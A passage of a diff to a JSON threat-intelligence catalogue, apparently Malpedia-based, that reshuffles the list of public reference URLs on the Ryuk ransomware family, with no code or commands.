+ "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf"
],
"synonyms": [],
"type": []
@@ -40230,169 +42426,170 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk",
- "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
- "https://community.riskiq.com/article/c88cf7e6",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021",
- "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
- "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://twitter.com/SecurityJoes/status/1402603695578157057",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
- "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://github.com/scythe-io/community-threats/tree/master/Ryuk",
+ "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects",
"https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/",
- "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/",
- "https://www.scythe.io/library/threatthursday-ryuk",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
- "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
- "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://blog.cyberint.com/ryuk-crypto-ransomware",
- "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc",
- "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/",
- "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf",
- "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
- "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
- "https://twitter.com/Prosegur/status/1199732264386596864",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
- "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
- "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp",
- "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/",
- "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/",
"https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
+ "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
+ "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes",
+ "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf",
+ "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html",
"https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://twitter.com/SophosLabs/status/1321844306970251265",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/",
+ "https://www.scythe.io/library/threatthursday-ryuk",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.youtube.com/watch?v=Of_KjNG9DHc",
+ "https://community.riskiq.com/article/c88cf7e6",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
"https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html",
+ "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/",
+ "https://twitter.com/IntelAdvanced/status/1353546534676258816",
+ "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
+ "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
+ "https://arcticwolf.com/resources/blog/karakurt-web",
+ "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
+ "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://www.youtube.com/watch?v=HwfRxjV2wok",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://www.youtube.com/watch?v=BhjQ6zsCVSc",
+ "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/",
+ "https://ia.acs.org.au/article/2019/hospital-cyberattack-could-have-been-avoided.html",
+ "https://0xchina.medium.com/malware-reverse-engineering-31039450af27",
+ "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://community.riskiq.com/article/0bcefe76",
+ "https://twitter.com/Prosegur/status/1199732264386596864",
+ "https://twitter.com/anthomsec/status/1321865315513520128",
+ "https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021",
+ "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
+ "https://blog.cyberint.com/ryuk-crypto-ransomware",
+ "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf",
+ "https://www.youtube.com/watch?v=CgDtm05qApE",
+ "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html",
+ "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
+ "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
+ "https://twitter.com/ffforward/status/1324281530026524672",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
+ "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.youtube.com/watch?v=7xxRunBP5XA",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/",
+ "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/",
+ "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/",
+ "https://twitter.com/SecurityJoes/status/1402603695578157057",
+ "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html",
+ "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
+ "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html",
+ "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc",
+ "https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf",
+ "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders",
+ "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/",
+ "https://twitter.com/IntelAdvanced/status/1356114606780002308",
+ "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/",
+ "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/",
+ "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/",
+ "https://blog.reversinglabs.com/blog/hunting-for-ransomware",
+ "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP",
+ "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
"https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/",
"https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html",
- "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/",
- "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
- "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/",
- "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes",
- "https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html",
- "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/anthomsec/status/1321865315513520128",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
- "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/",
- "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html",
- "https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf",
- "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
- "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/",
- "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/",
- "https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://twitter.com/IntelAdvanced/status/1353546534676258816",
- "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
- "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html",
- "https://www.youtube.com/watch?v=CgDtm05qApE",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
- "https://www.youtube.com/watch?v=7xxRunBP5XA",
- "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
- "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
- "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
- "https://github.com/scythe-io/community-threats/tree/master/Ryuk",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
- "https://twitter.com/SophosLabs/status/1321844306970251265",
- "https://www.youtube.com/watch?v=BhjQ6zsCVSc",
- "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects",
- "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
- "https://arcticwolf.com/resources/blog/karakurt-web",
- "https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/",
- "https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
- "https://community.riskiq.com/article/0bcefe76",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/",
- "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
- "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/",
- "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/",
- "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/",
- "https://www.youtube.com/watch?v=Of_KjNG9DHc",
- "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
- "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
- "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://thedfirreport.com/2020/10/08/ryuks-return/",
- "https://blog.reversinglabs.com/blog/hunting-for-ransomware",
- "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
- "https://twitter.com/ffforward/status/1324281530026524672",
- "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
- "https://twitter.com/IntelAdvanced/status/1356114606780002308",
